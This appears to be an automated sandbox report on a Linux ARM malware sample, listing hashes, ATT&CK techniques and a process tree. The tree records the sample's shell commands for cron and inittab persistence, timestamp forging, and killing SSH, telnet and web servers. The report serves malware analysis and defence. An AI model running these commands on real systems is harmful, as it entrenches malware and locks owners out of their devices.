7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160

Analysis

max time kernel
21s
max time network
126s
platform
linux_armhf
resource
debian9-armhf-en-20211208
resource tags

arch:armhfimage:debian9-armhf-en-20211208kernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
03-08-2023 20:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ef717a601f11e805a0d67e49a79ad602.elf
Size

605KB
MD5

ef717a601f11e805a0d67e49a79ad602
SHA1

17c25a39fc5faa931e1e99338c530b801f22397a
SHA256

7217b974542ea8e3d69211c4280f10b451f0a5d9df60a8ea091d89aa73a78160
SHA512

dcb245a5769bc921cabee37efdbaa71e5adb4f3637014d18d5de2dbf039d49b773875a25d6bb5a221614890fd3fb725a77aa2c92160379061058a5a10094a886
SSDEEP

12288:ZC1aCpxcLoP5fx5+rTGHqlXqDqPZyG65+jZvG0XqndyK7xTSZa6tdp:qbccP5Z5+rTGKlMqr65gZvG0XsdyJYw

Score

6^/10

persistence

Malware Config

Signatures

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.iaFphd	crontab

Enumerates kernel/hardware configuration 1 TTPs 45 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/cmdline	systemctl

/tmp/ef717a601f11e805a0d67e49a79ad602.elf
/tmp/ef717a601f11e805a0d67e49a79ad602.elf
1⤵
PID:351
- /bin/sh
  sh -c "touch -acmr /bin/ls /tmp/ef717a601f11e805a0d67e49a79ad602.elf"
  2⤵
  PID:352
- - /usr/bin/touch
    touch -acmr /bin/ls /tmp/ef717a601f11e805a0d67e49a79ad602.elf
    3⤵
    PID:354
- /bin/sh
  sh -c "(crontab -l | grep -v \"/tmp/ef717a601f11e805a0d67e49a79ad602.elf\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
  2⤵
  PID:358
- /bin/sh
  sh -c "echo \"* * * * * /tmp/ef717a601f11e805a0d67e49a79ad602.elf > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
  2⤵
  PID:364
- /bin/sh
  sh -c "crontab /var/run/.x00740882966"
  2⤵
  PID:365
- - /usr/bin/crontab
    crontab /var/run/.x00740882966
    3⤵
    - Creates/modifies Cron job
    - Reads runtime system information
    PID:366
- /bin/sh
  sh -c "rm -rf /var/run/.x00740882966"
  2⤵
  PID:367
- - /bin/rm
    rm -rf /var/run/.x00740882966
    3⤵
    PID:368
- /bin/sh
  sh -c "cat /etc/inittab | grep -v \"/tmp/ef717a601f11e805a0d67e49a79ad602.elf\" > /etc/inittab2"
  2⤵
  PID:369
- - /bin/cat
    cat /etc/inittab
    3⤵
    PID:370
- - /bin/grep
    grep -v /tmp/ef717a601f11e805a0d67e49a79ad602.elf
    3⤵
    PID:371
- /bin/sh
  sh -c "echo \"0:2345:respawn:/tmp/ef717a601f11e805a0d67e49a79ad602.elf\" >> /etc/inittab2"
  2⤵
  PID:372
- /bin/sh
  sh -c "cat /etc/inittab2 > /etc/inittab"
  2⤵
  PID:373
- - /bin/cat
    cat /etc/inittab2
    3⤵
    PID:374
- /bin/sh
  sh -c "rm -rf /etc/inittab2"
  2⤵
  PID:375
- - /bin/rm
    rm -rf /etc/inittab2
    3⤵
    PID:376
- /bin/sh
  sh -c "touch -acmr /bin/ls /etc/inittab"
  2⤵
  PID:377
- - /usr/bin/touch
    touch -acmr /bin/ls /etc/inittab
    3⤵
    PID:378

/usr/bin/crontab
crontab -l
1⤵
- Reads runtime system information
PID:360

/bin/grep
grep -v /tmp/ef717a601f11e805a0d67e49a79ad602.elf
1⤵
PID:361

/bin/grep
grep -v "no cron"
1⤵
PID:362

/bin/grep
grep -v lesshts/run.sh
1⤵
PID:363

/bin/sh
sh -c "/bin/uname -n"
1⤵
PID:380
- /bin/uname
  /bin/uname -n
  2⤵
  PID:381

/bin/sh
sh -c "/bin/uname -n"
1⤵
PID:382
- /bin/uname
  /bin/uname -n
  2⤵
  PID:383

/bin/sh
sh -c "/bin/uname -n"
1⤵
PID:384
- /bin/uname
  /bin/uname -n
  2⤵
  PID:385

/bin/sh
sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
1⤵
PID:386

/bin/sh
sh -c "service httpd stop > /dev/null 2>&1 &"
1⤵
PID:388

/bin/cat
cat /var/run/httpd.pid
1⤵
PID:389

/bin/sh
sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
1⤵
PID:391

/usr/sbin/service
service httpd stop
1⤵
PID:390
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:394
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:397
- /bin/systemctl
  systemctl --quiet is-active multi-user.target
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:401
- /bin/systemctl
  systemctl -p Triggers show dbus.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:428
- /bin/systemctl
  systemctl -p Triggers show ssh.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:435
- /bin/systemctl
  systemctl -p Triggers show syslog.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:440
- /bin/systemctl
  systemctl -p Triggers show systemd-fsckd.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:443
- /bin/systemctl
  systemctl -p Triggers show systemd-initctl.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:446
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-audit.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:449
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-dev-log.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:452
- /bin/systemctl
  systemctl -p Triggers show systemd-journald.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:455
- /bin/systemctl
  systemctl -p Triggers show systemd-networkd.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:458
- /bin/systemctl
  systemctl -p Triggers show systemd-rfkill.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:461
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-control.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:464
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-kernel.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:467

/bin/sh
sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
1⤵
PID:393

/bin/sh
sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
1⤵
PID:396

/bin/sh
sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
1⤵
PID:399

/bin/cat
cat /var/run/thttpd.pid
1⤵
PID:400

/bin/sh
sh -c "nvram set http_enable=0 > /dev/null 2>&1"
1⤵
PID:402

/bin/sh
sh -c "killall -9 httpd > /dev/null 2>&1 &"
1⤵
PID:403

/bin/sh
sh -c "service telnetd stop > /dev/null 2>&1 &"
1⤵
PID:405

/bin/sh
sh -c "service sshd stop > /dev/null 2>&1 &"
1⤵
PID:407

/usr/sbin/service
service telnetd stop
1⤵
PID:406
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:413
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:417
- /bin/systemctl
  systemctl --quiet is-active multi-user.target
  2⤵
  - Enumerates kernel/hardware configuration
  PID:421
- /bin/systemctl
  systemctl -p Triggers show dbus.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:436
- /bin/systemctl
  systemctl -p Triggers show ssh.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:441
- /bin/systemctl
  systemctl -p Triggers show syslog.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:444
- /bin/systemctl
  systemctl -p Triggers show systemd-fsckd.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:447
- /bin/systemctl
  systemctl -p Triggers show systemd-initctl.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:450
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-audit.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:453
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-dev-log.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:456
- /bin/systemctl
  systemctl -p Triggers show systemd-journald.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:459
- /bin/systemctl
  systemctl -p Triggers show systemd-networkd.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:462
- /bin/systemctl
  systemctl -p Triggers show systemd-rfkill.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:465
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-control.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:468
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-kernel.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:470

/bin/sh
sh -c "killall -9 telnetd > /dev/null 2>&1 &"
1⤵
PID:409

/usr/sbin/service
service sshd stop
1⤵
PID:408
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:416
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:418
- /bin/systemctl
  systemctl --quiet is-active multi-user.target
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:424
- /bin/systemctl
  systemctl -p Triggers show dbus.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:438
- /bin/systemctl
  systemctl -p Triggers show ssh.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:442
- /bin/systemctl
  systemctl -p Triggers show syslog.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:445
- /bin/systemctl
  systemctl -p Triggers show systemd-fsckd.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:448
- /bin/systemctl
  systemctl -p Triggers show systemd-initctl.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:451
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-audit.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:454
- /bin/systemctl
  systemctl -p Triggers show systemd-journald-dev-log.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:457
- /bin/systemctl
  systemctl -p Triggers show systemd-journald.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:460
- /bin/systemctl
  systemctl -p Triggers show systemd-networkd.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:463
- /bin/systemctl
  systemctl -p Triggers show systemd-rfkill.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:466
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-control.socket
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:469
- /bin/systemctl
  systemctl -p Triggers show systemd-udevd-kernel.socket
  2⤵
  - Enumerates kernel/hardware configuration
  PID:471

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Enumerates kernel/hardware configuration
PID:411

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:412

/bin/sh
sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
1⤵
PID:415

/bin/sh
sh -c "killall -9 dropbear > /dev/null 2>&1 &"
1⤵
PID:420

/bin/sh
sh -c "killall -9 sshd > /dev/null 2>&1 &"
1⤵
PID:423

/bin/sh
sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
1⤵
PID:426

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Enumerates kernel/hardware configuration
PID:431

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:432

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:434

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:433

/usr/local/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:390

/usr/local/bin/systemctl
systemctl stop httpd.service
1⤵
PID:390

/usr/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:390

/usr/bin/systemctl
systemctl stop httpd.service
1⤵
PID:390

/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:390

/bin/systemctl
systemctl stop httpd.service
1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:390

/usr/local/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:406

/usr/local/bin/systemctl
systemctl stop telnetd.service
1⤵
PID:406

/usr/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:406

/usr/bin/systemctl
systemctl stop telnetd.service
1⤵
PID:406

/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:406

/bin/systemctl
systemctl stop telnetd.service
1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:406

/usr/local/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:408

/usr/local/bin/systemctl
systemctl stop sshd.service
1⤵
PID:408

/usr/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:408

/usr/bin/systemctl
systemctl stop sshd.service
1⤵
PID:408

/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:408

/bin/systemctl
systemctl stop sshd.service
1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/inittab

Filesize
57B

MD5
c9c97362c1b4b3e11104c8e62378d652

SHA1
98675548e7df5be9a3217528c503c78ee311d34c

SHA256
a7040eee84ad5d53ebd79636a212e8cbd1c9b74784fc611618aeb3418817fe93

SHA512
e75e847e5f406af36d57f82b1ee7e912be53e8b9351c11ee2498f71af187f3eaed593bb1d6277c602cd5c1ab6cd3ac9eb17e43efea75b32ab4f2035ea53d98b3

Download Submit
/etc/inittab2

Filesize
57B

MD5
c9c97362c1b4b3e11104c8e62378d652

SHA1
98675548e7df5be9a3217528c503c78ee311d34c

SHA256
a7040eee84ad5d53ebd79636a212e8cbd1c9b74784fc611618aeb3418817fe93

SHA512
e75e847e5f406af36d57f82b1ee7e912be53e8b9351c11ee2498f71af187f3eaed593bb1d6277c602cd5c1ab6cd3ac9eb17e43efea75b32ab4f2035ea53d98b3

Download Submit
/run/.x00740882966

Filesize
71B

MD5
6973fcd1ffa04769772cd5b31fae9f27

SHA1
2fc17e1d82fed087268c173ada869cbf7e26078c

SHA256
ee32afea6e28d28d8dbc2c30e549e58237dfb9244c8ddb851cd90031240ba3e9

SHA512
f7c661f2f507c1e61a278f18298eafa04b34810724fe1d56c9f6b81320d33bf9d2feb7978f3e6b26a57e2453a1be55632f62836cc92420a38695d00676596e79

Download Submit
/var/spool/cron/crontabs/tmp.iaFphd

Filesize
267B

MD5
86f3021ddf4d14645ba9086bdd2e5b88

SHA1
9970e84f977205a30261411c26c036190ff47096

SHA256
204b29236e09cc8a915275e94cf9cf431950658e2b462bf00fc3b44097a82375

SHA512
821599eef761b811265d9d729d9c567ce02301c268fb83b1245fa4f998b451f8bbba11909b0ebe28aaa32905e492d887ea690ce7043b522697626bda69cc1d41

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads